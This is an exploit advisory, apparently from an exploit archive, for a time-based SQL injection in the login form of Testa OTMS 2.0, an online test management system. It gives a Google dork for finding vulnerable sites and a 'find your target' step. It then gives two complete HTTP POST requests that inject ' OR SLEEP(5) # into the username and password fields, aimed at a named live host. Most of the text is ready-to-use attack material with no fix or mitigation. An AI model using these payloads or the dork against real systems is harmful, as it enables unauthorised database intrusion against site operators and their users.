# Exploit Title: Testa OTMS 2.0 - Online Test Management System - 'uname','pass' Time Based SQL Injection # Date: 2020-07-21 # Google Dork: intitle:Testa - Online Test Management System # Exploit Author: Ultra Security Team # Team Members: Ashkan Moghaddas , AmirMohammad Safari , Behzad Khalifeh , Milad Ranjbar # Vendor Homepage: https://testa.cc # Version: v2.0 [Final Version] # Tested on: Windows/Linux # CVE: N/A .:: Description ::. Testa Helps You To Take Online Exams. .:: Proof Of Concept (PoC) ::. Step 1 - Find Your Target Using Testa OTMS - Online Test Management System. Step 2 - You Can Inject Your Payload on Username and Password Field. .:: Sample Request For Username Field ::. POST /test/index.php HTTP/1.1 Host: aradet.ir User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0 Cyberfox/52.9.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://aradet.ir/test/?test_id=3 Cookie: PHPSESSID=pu4viscmtfuvcvmojrf0ak23k4 Connection: close Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-form-urlencoded Content-Length: 63 uname=Test' OR SLEEP(5) #&pass=Test&reg=&test_id=3&B1=%D9%88%D8%B1%D9%88%D8%AF .:: Sample Request For Username Field ::. POST /test/index.php HTTP/1.1 Host: aradet.ir User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0 Cyberfox/52.9.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://aradet.ir/test/?test_id=3 Cookie: PHPSESSID=pu4viscmtfuvcvmojrf0ak23k4 Connection: close Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-form-urlencoded Content-Length: 78 uname=Test&pass=Test' OR SLEEP(5) #&reg=&test_id=3&B1=%D9%88%D8%B1%D9%88%D8%AF